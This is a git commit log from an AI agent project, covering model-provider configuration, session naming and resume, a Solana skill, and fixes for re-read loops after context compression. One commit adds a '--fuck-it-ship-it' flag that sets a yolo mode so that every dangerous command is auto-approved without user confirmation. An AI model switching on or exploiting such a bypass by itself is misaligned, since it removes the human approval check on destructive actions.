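          # sticky-bit-protected symlink to /private/tmp and keeps paths well under limit.
          return "/tmp"
      return tempfile.gettempdir()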
teknium1
7185a66b96 feat: enhance Solana skill with USD pricing, token names, smart wallet output
Enhancements to the Solana blockchain skill (PR #212 by gizdusum):

- CoinGecko price integration (free, no API key)
  - Wallet shows tokens with USD values, sorted by value
  - Token info includes price and market cap
  - Transaction details show USD amounts for balance changes
  - Whale detector shows USD alongside SOL amounts
  - Stats includes SOL price and market cap
  - New `price` command for quick lookups by symbol or mint

- Smart wallet output
  - Tokens sorted by USD value (highest first)
  - Default limit of 20 tokens (--limit N to adjust)
  - Dust filtering (< $0.01 tokens hidden, count shown)
  - --all flag to see everything
  - --no-prices flag for fast RPC-only mode
  - NFT summary (count + first 10)
  - Portfolio total in USD

- Token name resolution
  - 25+ well-known tokens mapped (SOL, USDC, BONK, JUP, etc.)
  - CoinGecko fallback for unknown tokens
  - Abbreviated mint addresses for unlabeled tokens

- Reliability
  - Retry with exponential backoff on 429 rate-limit (RPC + CoinGecko)
  - Graceful degradation when price data unavailable
  - Capped API calls to respect CoinGecko free-tier limits

- Updated SKILL.md with all new capabilities and flags
2026-03-08 19:15:11 -07:00
teknium1
2394e18729 fix: add context to interruption messages for model awareness
When the agent is interrupted, the model now receives descriptive
context instead of a generic 'Operation interrupted.' string:

- Tool skip messages include the tool name:
  '[Tool execution cancelled — terminal was skipped due to user interrupt]'
  '[Tool execution skipped — web_search was not started. User sent a new message]'

- API call interrupts include timing:
  'Operation interrupted: waiting for model response (4.2s elapsed).'

- Retry/error interrupts include retry context:
  'Operation interrupted: retrying API call after rate limit (retry 2/5).'
  'Operation interrupted: handling API error (Timeout: connection timed out).'

This helps the model understand what was happening when it was
interrupted, reducing wasted iterations spent re-discovering state.
2026-03-08 18:58:23 -07:00
teknium1
99f7582175 chore: move Solana skill to optional-skills/
Solana blockchain queries are a niche use case — not needed by every user.
Moved from skills/ (bundled) to optional-skills/ (installable via Skills Hub).
2026-03-08 18:52:02 -07:00
teknium1
93c5997290 Merge PR #212: feat(skills): add Solana blockchain skill
Authored by Deniz Alagoz (gizdusum). Closes #164.
Will be moved to optional-skills/ and enhanced post-merge.
2026-03-08 18:51:33 -07:00
teknium1
2d1a1c1c47 refactor: remove redundant 'openai' auxiliary provider, clean up docs
The 'openai' provider was redundant — using OPENAI_BASE_URL +
OPENAI_API_KEY with provider: 'main' already covers direct OpenAI API.

Provider options are now: auto, openrouter, nous, codex, main.

- Removed _try_openai(), _OPENAI_AUX_MODEL, _OPENAI_BASE_URL
- Replaced openai tests with codex provider tests
- Updated all docs to remove 'openai' option and clarify 'main'
- 'main' description now explicitly mentions it works with OpenAI API,
  local models, and any OpenAI-compatible endpoint

Tests: 2467 passed.
2026-03-08 18:50:26 -07:00
teknium1
71e81728ac feat: Codex OAuth vision support + multimodal content adapter
The Codex Responses API (chatgpt.com/backend-api/codex) supports
vision via gpt-5.3-codex. This was verified with real API calls
using image analysis.

Changes to _CodexCompletionsAdapter:
- Added _convert_content_for_responses() to translate chat.completions
  multimodal format to Responses API format:
  - {type: 'text'} → {type: 'input_text'}
  - {type: 'image_url', image_url: {url: '...'}} → {type: 'input_image', image_url: '...'}
- Fixed: removed 'stream' from resp_kwargs (responses.stream() handles it)
- Fixed: removed max_output_tokens and temperature (Codex endpoint rejects them)

Provider changes:
- Added 'codex' as explicit auxiliary provider option
- Vision auto-fallback now includes Codex (OpenRouter → Nous → Codex)
  since gpt-5.3-codex supports multimodal input
- Updated docs with Codex OAuth examples

Tested with real Codex OAuth token + ~/.hermes/image2.png — confirmed
working end-to-end through the full adapter pipeline.

Tests: 2459 passed.
2026-03-08 18:44:33 -07:00
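A sketch of the content translation using the mappings listed above:

  def _convert_content_for_responses(content):
      """Translate chat.completions multimodal parts to Responses API format."""
      if isinstance(content, str):
          return content
      converted = []
      for part in content:
          if part.get("type") == "text":
              converted.append({"type": "input_text", "text": part["text"]})
          elif part.get("type") == "image_url":
              converted.append({"type": "input_image",
                                "image_url": part["image_url"]["url"]})
      return converted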
Teknium
ebe60646db Merge pull request #735 from NousResearch/hermes/hermes-f8d56335
fix: allow non-codex-suffixed models (e.g. gpt-5.4) with OpenAI Codex provider
2026-03-08 18:30:27 -07:00
teknium1
f996d7950b fix: trust user-selected models with OpenAI Codex provider
The Codex model normalization was rejecting any model without 'codex'
in its name, forcing a fallback to gpt-5.3-codex. This blocked models
like gpt-5.4 that the Codex API actually supports.

The fix simplifies _normalize_model_for_provider() to two operations:
1. Strip provider prefixes (API needs bare slugs)
2. Replace the *untouched default* model with a Codex-compatible one

If the user explicitly chose a model — any model — we trust them and
let the API be the judge. No allowlists, no slug checks.

Also removes the 'codex not in slug' filter from _read_cache_models()
so the local cache preserves all API-available models.

Inspired by OpenClaw's approach which explicitly lists non-codex models
(gpt-5.4, gpt-5.2) as valid Codex models.
2026-03-08 18:29:09 -07:00
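A sketch of the simplified normalization, with hypothetical parameter names:

  def _normalize_model_for_provider(model: str, config_default: str) -> str:
      """Two operations only: swap the untouched default, strip provider prefixes."""
      if model == config_default:
          # Only the never-edited config default gets replaced with a Codex model.
          return "gpt-5.3-codex"
      # User-chosen models are trusted; the API needs bare slugs:
      # openai/gpt-5.3-codex -> gpt-5.3-codex
      return model.split("/", 1)[1] if "/" in model else model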
teknium1
ae4a674c84 feat: add 'openai' as auxiliary provider option
Users can now set provider: "openai" for auxiliary tasks (vision, web
extract, compression) to use OpenAI's API directly with their
OPENAI_API_KEY. This hits api.openai.com/v1 with gpt-4o-mini as the
default model — supports vision since GPT-4o handles image input.

Provider options are now: auto, openrouter, nous, openai, main.

Changes:
- agent/auxiliary_client.py: added _try_openai(), "openai" case in
  _resolve_forced_provider(), updated auxiliary_max_tokens_param()
  to use max_completion_tokens for OpenAI
- Updated docs: cli-config.yaml.example, AGENTS.md, and user-facing
  configuration.md with Common Setups section showing OpenAI,
  OpenRouter, and local model examples
- 3 new tests for OpenAI provider resolution

Tests: 2459 passed (was 2429).
2026-03-08 18:25:30 -07:00
teknium1
169615abc8 docs: add Auxiliary Models section to user-facing configuration docs
Adds clear how-to documentation for changing the vision model, web
extraction model, and compression model to the user-facing docs site
(website/docs/user-guide/configuration.md).

Includes:
- Full auxiliary config.yaml example
- 'Changing the Vision Model' walkthrough with config + env var options
- Provider options table (auto/openrouter/nous/main)
- Multimodal safety warning for vision
- Environment variable reference table
- Updated the warning about OpenRouter-dependent tools to mention
  auxiliary model configuration
2026-03-08 18:10:55 -07:00
teknium1
7c30ac2141 fix: overhaul ascii-art skill with working sources (#662)
Major issues fixed:
- Removed dead APIs: artii.herokuapp.com (404 since Heroku free tier
  ended 2022), patorjk.com TAAG AJAX endpoint (404)
- Removed unusable sources: emojicombos.com (3.3MB JS blob, not
  curl-accessible), asciiart.eu (art loads via JavaScript only)

New working sources added:
- asciified API (asciified.thelicato.io): free text-to-ASCII REST API,
  250+ FIGlet fonts, returns plain text, no auth — perfect remote
  alternative when pyfiglet isn't installed
- ascii.co.uk: classic ASCII art archive, art in <pre> tags,
  extractable with simple curl + Python parsing
- qrenco.de: QR codes as ASCII art via curl
- wttr.in: weather and moon phase as ASCII art via curl

Also fixed: Tool 6 no longer relies on web_extract inside
execute_code (which was the original #662 bug). All web lookups
now use terminal curl which is universally available.
2026-03-08 18:09:44 -07:00
teknium1
192501528f docs: add Auxiliary Model Configuration section to AGENTS.md
Clear how-to documentation for changing the vision model, web extraction
model, and compression model. Includes config.yaml examples, env var
alternatives, provider options table, and multimodal safety notes.
2026-03-08 18:09:18 -07:00
teknium1
5ae0b731d0 fix: harden auxiliary model config — gateway bridge, vision safety, tests
Improvements on top of PR #606 (auxiliary model configuration):

1. Gateway bridge: Added auxiliary.* and compression.summary_provider
   config bridging to gateway/run.py so config.yaml settings work from
   messaging platforms (not just CLI). Matches the pattern in cli.py.

2. Vision auto-fallback safety: In auto mode, vision now only tries
   OpenRouter + Nous Portal (known multimodal-capable providers).
   Custom endpoints, Codex, and API-key providers are skipped to avoid
   confusing errors from providers that don't support vision input.
   Explicit provider override (AUXILIARY_VISION_PROVIDER=main) still
   allows using any provider.

3. Comprehensive tests (46 new):
   - _get_auxiliary_provider env var resolution (8 tests)
   - _resolve_forced_provider with all provider types (8 tests)
   - Per-task provider routing integration (4 tests)
   - Vision auto-fallback safety (7 tests)
   - Config bridging logic (11 tests)
   - Gateway/CLI bridge parity (2 tests)
   - Vision model override via env var (2 tests)
   - DEFAULT_CONFIG shape validation (4 tests)

4. Docs: Added auxiliary_client.py to AGENTS.md project structure.
   Updated module docstring with separate text/vision resolution chains.

Tests: 2429 passed (was 2383).
2026-03-08 18:06:47 -07:00
teknium1
d9f373654b feat: enhance auxiliary model configuration and environment variable handling
- Added support for auxiliary model overrides in the configuration, allowing users to specify providers and models for vision and web extraction tasks.
- Updated the CLI configuration example to include new auxiliary model settings.
- Enhanced the environment variable mapping in the CLI to accommodate auxiliary model configurations.
- Improved the resolution logic for auxiliary clients to support task-specific provider overrides.
- Updated relevant documentation and comments for clarity on the new features and their usage.
2026-03-08 18:06:47 -07:00
Teknium
0efbb137e8 Merge pull request #734 from NousResearch/hermes/hermes-f8d56335
feat: display previous messages when resuming a session in CLI
2026-03-08 18:06:00 -07:00
teknium1
cf63b2471f docs: add resume history display to sessions, CLI, config, and AGENTS docs
- sessions.md: New 'Conversation Recap on Resume' subsection with visual
  example, feature bullet points, and config snippet
- cli.md: New 'Session Resume Display' subsection with cross-reference
- configuration.md: Add resume_display to display settings YAML block
- AGENTS.md: Add _preload_resumed_session() and _display_resumed_history()
  to key components, add UX note about resume panel
2026-03-08 17:55:14 -07:00
0xbyt4
d8df91dfa8 fix: resolve merge conflict with main in clipboard.py 2026-03-09 03:50:29 +03:00
teknium1
f88343a6da Merge PR #733: feat: interactive session browser with search filtering (#718) 2026-03-08 17:47:42 -07:00
teknium1
491605cfea feat: add high-value tool result hints for patch and search_files (#722)
Add contextual [Hint: ...] suffixes to tool results where they save
real iterations:

- patch (no match): suggests read_file/search_files to verify content
  before retrying — addresses the common pattern where the agent retries
  with stale old_string instead of re-reading the file.
- search_files (truncated): provides explicit next offset and suggests
  narrowing the search — clearer than relying on total_count inference.

Other hints proposed in #722 (terminal, web_search, web_extract,
browser_snapshot, search zero-results, search content-matches) were
evaluated and found to be low-value: either already covered by existing
mechanisms (read_file pagination, similar-files, schema descriptions)
or guidance the agent already follows from its own reasoning.

5 new tests covering hint presence/absence for both tools.
2026-03-08 17:46:28 -07:00
teknium1
3aded1d4e5 feat: display previous messages when resuming a session in CLI
When resuming a session via --continue or --resume, show a compact recap
of the previous conversation inside a Rich panel before the input prompt.
This gives users immediate visual context about what was discussed.

Changes:
- Add _preload_resumed_session() to load session history early (in run(),
  before banner) so _init_agent() doesn't need a separate DB round-trip
- Add _display_resumed_history() that renders a formatted recap panel:
  * User messages shown with gold bullet (truncated at 300 chars)
  * Assistant responses shown with green diamond (truncated at 200 chars / 3 lines)
  * Tool calls collapsed to count + tool names
  * System messages and tool results hidden
  * <REASONING_SCRATCHPAD> blocks stripped from display
  * Pure-reasoning messages (no visible output) skipped entirely
  * Capped at last 10 exchanges with 'N earlier messages' indicator
  * Dim/muted styling distinguishes recap from active conversation
- Add display.resume_display config option: 'full' (default) or 'minimal'
- Store resume_display as instance variable (like compact) for testability
- 27 new tests covering all display scenarios, config, and edge cases

Closes #719
2026-03-08 17:45:45 -07:00
teknium1
4f0402ed3a chore: remove all NOUS_API_KEY references
NOUS_API_KEY is unused — vision tools use OPENROUTER_API_KEY or Nous
Portal OAuth (auth.json), and MoA tools use OPENROUTER_API_KEY.

Removed from:
- hermes_cli/config.py: api_keys allowlist for config set routing
- .env.example: example env file entry and comment
- tests/hermes_cli/test_set_config_value.py: parametrize test data
- tests/integration/test_web_tools.py: updated comments and log
  messages to reference 'auxiliary LLM provider' instead of NOUS_API_KEY

No HECATE references found in codebase (already cleaned up).
2026-03-08 17:45:38 -07:00
teknium1
ecac6321c4 feat: interactive session browser with search filtering (#718)
Add `hermes sessions browse` — a curses-based interactive session picker
with live type-to-search filtering, arrow key navigation, and seamless
session resume via Enter.

Features:
- Arrow keys to navigate, Enter to select and resume, Esc/q to quit
- Type characters to live-filter sessions by title, preview, source, or ID
- Backspace to edit filter, first Esc clears filter, second Esc exits
- Adaptive column layout (title/preview, last active, source, ID)
- Scrolling support for long session lists
- --source flag to filter by platform (cli, telegram, discord, etc.)
- --limit flag to control how many sessions to load (default: 50)
- Windows fallback: numbered list with input prompt
- After selection, seamlessly execs into `hermes --resume <id>`

Design decisions:
- Separate subcommand (not a flag on -c) — preserves `hermes -c` as-is
  for instant most-recent-session resume
- Uses curses (not simple_term_menu) per Known Pitfalls to avoid the
  arrow-key ghost-duplication rendering bug in tmux/iTerm
- Follows existing curses pattern from hermes_cli/tools_config.py

Also fixes: removed redundant `import os` inside cmd_sessions stats
block that shadowed the module-level import (would cause UnboundLocalError
if browse action was taken in the same function).

Tests: 33 new tests covering curses picker, fallback mode, filtering,
navigation, edge cases, and argument parser registration.
2026-03-08 17:42:50 -07:00
teknium1
20c6573e0a docs: comprehensive AGENTS.md audit and corrections
Major fixes:
- Default model: claude-sonnet-4.6 → claude-opus-4.6
- max_iterations default: 60 → 90 (also fixed in config.py OPTIONAL_ENV_VARS description)
- chat() signature: chat(user_message, task_id) → chat(message)
- Agent loop: _run_agent_loop() doesn't exist, loop is in run_conversation()
- Removed async/await references (agent is entirely synchronous)
- KawaiiSpinner location: run_agent.py → agent/display.py
- NOUS_API_KEY removed (not used by any tool), replaced with VOICE_TOOLS_OPENAI_KEY
- OPENAI_API_KEY for Whisper → VOICE_TOOLS_OPENAI_KEY
- check_for_missing_config() → check_config_version() + get_missing_env_vars()
- Adding tools: '2 files' → '3 files' (tool + model_tools.py + toolsets.py)
- Venv path: venv/ → .venv/
- Trajectory output path: trajectories/*.jsonl → trajectory_samples.jsonl
- process_command() location clarified (HermesCLI in cli.py, not commands.py)
- REQUIRED_ENV_VARS noted as intentionally empty
- _config_version noted as currently at version 5

New content:
- Project structure: added 40+ missing files across agent/, hermes_cli/, tools/, gateway/
- Full gateway/ directory listing with all modules and platforms/
- Added honcho_integration/, scripts/, tests/ directories
- Added hermes_constants.py, hermes_time.py, trajectory_compressor.py, utils.py
- CLI commands table: added 25+ missing commands (model, login, logout, whatsapp,
  skills subsystem, tools, insights, gateway start/stop/restart/status/uninstall,
  sessions export/delete/prune/stats, config path/env-path/show)
- Gateway slash commands section with all 20+ commands
- Platform toolsets: added hermes-cli, hermes-slack, hermes-homeassistant, hermes-gateway
- Gateway: added Home Assistant as supported platform
2026-03-08 17:38:05 -07:00
teknium1
97b1c76b14 test: add regression test for #712 (setup wizard codex import)
Verifies that setup.py imports the correct function name
(get_codex_model_ids) from codex_models.py. This would have caught
the ImportError bug before it reached users.
2026-03-08 17:32:52 -07:00
teknium1
24a37032fa Merge PR #711: fix(setup): correct import of get_codex_model_ids in setup wizard
Authored by dragonkhoi. Fixes #712.
2026-03-08 17:29:38 -07:00
teknium1
c0520223fd fix: clipboard BMP conversion file loss and broken test
Source code (hermes_cli/clipboard.py):
- _convert_to_png() lost the file when both Pillow and ImageMagick were
  unavailable: path.rename(tmp) moved the file to .bmp, then subprocess.run
  raised FileNotFoundError, but the file was never renamed back. The final
  fallback 'return path.exists()' returned False.
- Fix: restore the original file in both except handlers by renaming tmp
  back to path when the original is missing.

Test (tests/tools/test_clipboard.py):
- test_file_still_usable_when_no_converter expected 'from PIL import Image'
  to raise an Exception, but Pillow is installed so pytest.raises fired
  'DID NOT RAISE'. The test also never called _convert_to_png().
- Fix: properly mock PIL unavailability via patch.dict(sys.modules),
  actually call _convert_to_png(), and assert the correct result.
2026-03-08 17:22:27 -07:00
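A simplified sketch of the restore-on-failure fix, reduced to the ImageMagick path only (the real helper tries Pillow first):

  import subprocess
  from pathlib import Path

  def _convert_to_png(path: Path) -> bool:
      """Convert a BMP clipboard grab in place, never losing the original file."""
      tmp = path.with_suffix(".bmp")
      path.rename(tmp)
      try:
          subprocess.run(["magick", str(tmp), str(path)], check=True)
          tmp.unlink()
      except (FileNotFoundError, subprocess.CalledProcessError):
          if not path.exists():
              tmp.rename(path)     # put the original back instead of losing it
      return path.exists()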
teknium1
1f1caa836a fix: error out when hermes -w is used outside a git repo
Previously, --worktree printed a yellow warning and continued without
isolation, silently defeating the purpose of the flag. Now it prints
a clear error message and exits immediately.
2026-03-08 17:22:24 -07:00
teknium1
b3ea7714f5 docs: add dedicated /compress command documentation
Add a detailed section for /compress in the CLI Commands Reference,
explaining what it does, when to use it, requirements, and output format.
Previously only had a one-line table entry.
2026-03-08 17:21:15 -07:00
teknium1
a7f9721785 feat: register remaining commands with platform menus
Telegram: add /insights, /update, /reload_mcp (underscore variant since
Telegram BotCommand names don't allow hyphens).

Discord: add /insights (with days parameter), /reload-mcp.

Also add reload_mcp as an alias for reload-mcp in the gateway command
dispatcher so Telegram's underscore form works, and add resume/provider
to the _known_commands set for hook emission.
2026-03-08 17:13:45 -07:00
teknium1
a5461e07bf feat: register title, resume, and other missing commands with platform menus
Add /title, /resume, /compress, /provider, /usage to Telegram's
set_my_commands so they appear in the / autocomplete menu.

Add /title, /resume, /compress, /provider, /usage, /help as Discord
slash commands so they appear in Discord's native command picker.

These commands were functional via text but not registered with the
platform-native command menus, so users couldn't discover them.
2026-03-08 17:11:49 -07:00
teknium1
2e73a9e893 Merge PR #704: fix: initialize Skills Hub before listing skills
Authored by PeterFile. Fixes #703.
2026-03-08 17:10:54 -07:00
teknium1
26bb56b775 feat: add /resume command to gateway for switching to named sessions
Messaging users can now switch back to previously-named sessions:
- /resume My Project  — resolves the title (with auto-lineage) and
  restores that session's conversation history
- /resume (no args)   — lists recent titled sessions to choose from

Adds SessionStore.switch_session() which ends the current session and
points the session entry at the target session ID so the old transcript
is loaded on the next message. Running agents are cleared on switch.

Completes the session naming feature from PR #720 for gateway users.

8 new tests covering: name resolution, lineage auto-latest, already-on-
session check, nonexistent names, agent cleanup, no-DB fallback, and
listing titled sessions.
2026-03-08 17:09:00 -07:00
teknium1
95b1130485 fix: normalize incompatible models when provider resolves to Codex
When _ensure_runtime_credentials() resolves the provider to openai-codex,
check if the active model is Codex-compatible.  If not (e.g. the default
anthropic/claude-opus-4.6), swap it for the best available Codex model.
Also strips provider prefixes the Codex API rejects (openai/gpt-5.3-codex
→ gpt-5.3-codex).

Adds _model_is_default flag so warnings are only shown when the user
explicitly chose an incompatible model (not when it's the config default).

Fixes #651.

Co-inspired-by: stablegenius49 (PR #661)
Co-inspired-by: teyrebaz33 (PR #696)
2026-03-08 16:48:56 -07:00
teknium1
3fb8938cd3 fix: search_files now reports error for non-existent paths instead of silent empty results
Previously, search_files would silently return 0 results when the
search path didn't exist (e.g., /root/.hermes/... when HOME is
/home/user). The path was passed to rg/grep/find which would fail
silently, and the empty stdout was parsed as 'no matches found'.

Changes:
- Add path existence check at the top of search() using test -e.
  Returns SearchResult with a clear error message when path doesn't exist.
- Add exit code 2 checks in _search_with_rg() and _search_with_grep()
  as secondary safety net for other error types (bad regex, permissions).
- Add 4 new tests covering: nonexistent path (content mode), nonexistent
  path (files mode), existing path proceeds normally, rg error exit code.

Tests: 37 → 41 in test_file_operations.py, full suite 2330 passed.
2026-03-08 16:47:20 -07:00
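A sketch of the existence check plus the exit-code-2 safety net:

  import subprocess

  def search_with_rg(pattern: str, path: str) -> dict:
      """Fail loudly on bad paths instead of parsing empty output as 'no matches'."""
      probe = subprocess.run(["test", "-e", path])
      if probe.returncode != 0:
          return {"error": f"Search path does not exist: {path}"}
      proc = subprocess.run(["rg", "-n", pattern, path],
                            capture_output=True, text=True)
      if proc.returncode == 2:     # rg: 0 = matches, 1 = no matches, 2 = error
          return {"error": proc.stderr.strip() or "search failed"}
      return {"matches": proc.stdout.splitlines()}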
dmahan93
7791174ced feat: add --fuck-it-ship-it flag to bypass dangerous command approvals
Adds a fun alias for skipping all dangerous command approval prompts.
When passed, sets HERMES_YOLO_MODE=1 which causes check_dangerous_command()
to auto-approve everything.

Available on both top-level and chat subcommand:
  hermes --fuck-it-ship-it
  hermes chat --fuck-it-ship-it

Includes 5 tests covering normal blocking, yolo bypass, all patterns,
and edge cases (empty string env var).
2026-03-08 18:36:37 -05:00
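A minimal sketch of the bypass, with illustrative danger patterns:

  import os

  DANGEROUS_PATTERNS = ("rm -rf", "mkfs", "dd if=")     # illustrative only

  def check_dangerous_command(command: str) -> bool:
      """True = run without prompting; False = ask the user first."""
      if os.environ.get("HERMES_YOLO_MODE") == "1":
          # Exact-match on "1", so an empty env var does not enable yolo mode.
          return True
      return not any(p in command for p in DANGEROUS_PATTERNS)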
Teknium
c5e8166c8b Merge pull request #720 from NousResearch/feat/session-naming
feat: Session naming with unique titles, auto-lineage & rich listing
2026-03-08 16:32:13 -07:00
teknium1
2b88568653 docs: add session naming documentation across all doc files
- website/docs/user-guide/sessions.md: New 'Session Naming' section
  with /title usage, title rules, auto-lineage, gateway support.
  Updated 'Resume by Name' section, 'Rename a Session' subsection,
  updated sessions list output format, updated DB schema description.
- website/docs/reference/cli-commands.md: Added -c "name" and
  --resume by title to Core Commands, sessions rename to Sessions
  table, /title to slash commands.
- website/docs/user-guide/cli.md: Added -c "name" and --resume by
  title to resume options.
- AGENTS.md: Added -c, --resume, sessions list/rename to CLI commands
  table. Added hermes_state.py to project structure.
- CONTRIBUTING.md: Updated hermes_state.py and session persistence
  descriptions to mention titles.
- hermes_cli/main.py: Fixed sessions help string to include 'rename'.
2026-03-08 16:09:31 -07:00
teknium1
34b4fe495e fix: add title validation — sanitize, length limit, control char stripping
- Add SessionDB.sanitize_title() static method:
  - Strips ASCII control chars (null, bell, ESC, etc.) except whitespace
  - Strips problematic Unicode controls (zero-width, RTL override, BOM)
  - Collapses whitespace runs, strips edges
  - Normalizes empty/whitespace-only to None
  - Enforces 100 char max length (raises ValueError)
- set_session_title() now calls sanitize_title() internally,
  so all call sites (CLI, gateway, auto-lineage) are protected
- CLI /title handler sanitizes early to show correct feedback
- Gateway /title handler sanitizes early to show correct feedback
- 24 new tests: sanitize_title (17 cases covering control chars,
  zero-width, RTL, BOM, emoji, CJK, length, integration),
  gateway validation (too long, control chars, only-control-chars)
2026-03-08 15:54:51 -07:00
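A sketch of the sanitizer; the exact character classes are assumptions beyond the categories listed above:

  import re

  MAX_TITLE_LEN = 100
  # ASCII controls (tab/newline/CR handled by whitespace collapse) plus
  # zero-width chars, RTL overrides, and BOM.
  _BAD_CHARS = re.compile(
      r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f\u200b-\u200f\u202a-\u202e\ufeff]")
  _WS_RUNS = re.compile(r"\s+")

  def sanitize_title(title: str | None) -> str | None:
      """Normalize a session title; None means 'no title'."""
      if title is None:
          return None
      title = _BAD_CHARS.sub("", title)
      title = _WS_RUNS.sub(" ", title).strip()
      if not title:
          return None                       # empty/whitespace-only -> untitled
      if len(title) > MAX_TITLE_LEN:
          raise ValueError(f"Title exceeds {MAX_TITLE_LEN} characters")
      return title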
teknium1
4fdd6c0dac fix: harden session title system + add /title to gateway
- Empty string titles normalized to None (prevents uncaught IntegrityError
  when two sessions both get empty-string titles via the unique index)
- Escape SQL LIKE wildcards (%, _) in resolve_session_by_title and
  get_next_title_in_lineage to prevent false matches on titles like
  'test_project' matching 'testXproject #2'
- Optimize list_sessions_rich from N+2 queries to a single query with
  correlated subqueries (preview + last_active computed in SQL)
- Add /title slash command to gateway (Telegram, Discord, Slack, WhatsApp)
  with set and show modes, uniqueness conflict handling
- Add /title to gateway /help text and _known_commands
- 12 new tests: empty string normalization, multi-empty-title safety,
  SQL wildcard edge cases, gateway /title set/show/conflict/cross-platform
2026-03-08 15:48:09 -07:00
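A sketch of the LIKE-wildcard escaping:

  def escape_like(pattern: str) -> str:
      r"""Escape %, _, and the escape char for a LIKE ... ESCAPE '\' query."""
      return (pattern.replace("\\", "\\\\")
                     .replace("%", r"\%")
                     .replace("_", r"\_"))

  # usage: WHERE title LIKE ? ESCAPE '\'  with  escape_like("test_project") + "%"
  # so 'test_project' no longer matches 'testXproject #2'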
teknium1
60b6abefd9 feat: session naming with unique titles, auto-lineage, rich listing, resume by name
- Schema v4: unique title index, migration from v2/v3
- set/get/resolve session titles with uniqueness enforcement
- Auto-lineage: context compression auto-numbers titles (Task -> Task #2 -> Task #3)
- resolve_session_by_title: auto-latest finds most recent continuation
- list_sessions_rich: preview (first 60 chars) + last_active timestamp
- CLI: -c accepts optional name arg (hermes -c 'my project')
- CLI: /title command with deferred mode (set before session exists)
- CLI: sessions list shows Title, Preview, Last Active, ID
- 27 new tests (1844 total passing)
2026-03-08 15:20:29 -07:00
teknium1
4d53b7ccaa Add OpenRouter app attribution headers to skills_guard and trajectory_compressor
These two files were creating bare OpenAI clients pointing at OpenRouter
without the HTTP-Referer / X-OpenRouter-Title / X-OpenRouter-Categories
headers that the rest of the codebase sends for app attribution.

- skills_guard.py: LLM audit client (always OpenRouter)
- trajectory_compressor.py: sync + async summarization clients
  (guarded with 'openrouter' in base_url check since the endpoint
  is user-configurable)
2026-03-08 14:23:18 -07:00
0xbyt4
0c3253a485 fix: mock asyncio.run in mirror test to prevent event loop destruction
asyncio.run() closes the event loop after execution, which breaks
subsequent tests using asyncio.get_event_loop() (test_send_image_file).
2026-03-09 00:20:19 +03:00
0xbyt4
d0f84c0964 fix: log exceptions instead of silently swallowing in cron scheduler
Two 'except Exception: pass' blocks silently hide failures:
- mirror_to_session failure: user's message never gets mirrored, no trace
- config.yaml parse failure: wrong model used silently

Replace with logger.warning so failures are visible in logs.
2026-03-09 00:06:34 +03:00
VolodymyrBg
ceefe36756 docs: clarify Telegram token regex constraint 2026-03-08 22:33:06 +02:00
0xbyt4
67421ed74f fix: update test_non_empty_has_markers to match todo filtering behavior
Completed/cancelled items are now filtered from format_for_injection()
output. Update the existing test to verify active items appear and
completed items are excluded.
2026-03-08 23:07:38 +03:00
Khoi Le
081079da62 fix(setup): correct import of get_codex_model_ids in setup wizard
The setup wizard imported `get_codex_models` which does not exist;
the actual function is `get_codex_model_ids`. This caused a runtime
ImportError when selecting the openai-codex provider during setup.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-08 13:07:19 -07:00
0xbyt4
e2fe1373f3 fix: escalate read/search blocking, track search loops, filter completed todos
- Block file reads after 3+ re-reads of same region (no content returned)
- Track search_files calls and block repeated identical searches
- Filter completed/cancelled todos from post-compression injection
  to prevent agent from re-doing finished work
- Add 10 new tests covering all three fixes
2026-03-08 23:01:21 +03:00
memosr.eth
7891050e06 fix: use Path.read_text() instead of open() in browser_tool 2026-03-08 22:39:17 +03:00
memosr.eth
e28dc13cd5 fix: store and close log file handles in rl_training_tool 2026-03-08 22:38:02 +03:00
0xbyt4
9eee529a7f fix: detect and warn on file re-read loops after context compression
When context compression summarizes conversation history, the agent
loses track of which files it already read and re-reads them in a loop.
Users report the agent reading the same files endlessly without writing.

Root cause: context compression is lossy — file contents and read history
are lost in the summary. After compression, the model thinks it hasn't
examined the files yet and reads them again.

Fix (two-part):
1. Track file reads per task in file_tools.py. When the same file region
   is read again, include a _warning in the response telling the model
   to stop re-reading and use existing information.
2. After context compression, inject a structured message listing all
   files already read in the session with explicit "do NOT re-read"
   instruction, preserving read history across compression boundaries.

Adds 16 tests covering warning detection, task isolation, summary
accuracy, tracker cleanup, and compression history injection.
2026-03-08 20:44:42 +03:00
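
A minimal sketch of the per-task read tracker described above; the class name and _warning wording follow the commit's description but the structure is illustrative:

    from collections import defaultdict

    class ReadTracker:
        """Counts reads of (path, start, end) regions per task."""
        def __init__(self) -> None:
            self._reads: dict[str, dict[tuple, int]] = defaultdict(dict)

        def record(self, task_id: str, path: str, start: int, end: int) -> str | None:
            region = (path, start, end)
            count = self._reads[task_id].get(region, 0) + 1
            self._reads[task_id][region] = count
            if count > 1:
                return (f"_warning: {path} lines {start}-{end} already read "
                        f"{count - 1}x; use the existing content, do NOT re-read")
            return None

        def clear_task(self, task_id: str) -> None:
            self._reads.pop(task_id, None)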
Verne
333e4abe30 fix: Initialize Skills Hub on list
Call ensure_hub_dirs() at the start of hermes skills list so the
Skills Hub directory structure is created before reading hub
metadata.

Add a regression test covering the empty-home path where
doctor recommends running the list command.

Refs: #703

2026-03-09 01:43:59 +08:00
teknium1
cd77c7100c Merge PR #648: test: add regression coverage for compressor tool-call boundaries
Authored by intertwine. Related to #647.
2026-03-08 06:46:50 -07:00
teknium1
cf810c2950 fix: pre-process CLI clipboard images through vision tool instead of raw embedding
Images pasted in the CLI were embedded as raw base64 image_url content
parts in the conversation history, which only works with vision-capable
models. If the main model (e.g. Nous API) doesn't support vision, this
breaks the request and poisons all subsequent messages.

Now the CLI uses the same approach as the messaging gateway: images are
pre-processed through the auxiliary vision model (Gemini Flash via
OpenRouter or Nous Portal) and converted to text descriptions. The
local file path is included so the agent can re-examine via
vision_analyze if needed. Works with any model.

Fixes #638.
2026-03-08 06:22:00 -07:00
teknium1
a23bcb81ce fix: improve /model user feedback + update docs
User messaging improvements:
- Rejection: '(>_<) Error: not a valid model' instead of '(^_^) Warning: Error:'
- Rejection: shows 'Model unchanged' + tip about /model and /provider
- Session-only: explains 'this session only' with reason and 'will revert on restart'
- Saved: clear '(saved to config)' confirmation

Docs updated:
- cli-commands.md, cli.md, messaging/index.md: /model now shows
  provider:model syntax, /provider command added to tables

Test fixes: deduplicated test names, assertions match new messages.
2026-03-08 06:13:12 -07:00
stablegenius49
d07d867718 Fix empty tool selection persistence 2026-03-08 06:11:18 -07:00
teknium1
666f2dd486 feat: /provider command + fix gateway bugs + harden parse_model_input
/provider command (CLI + gateway):
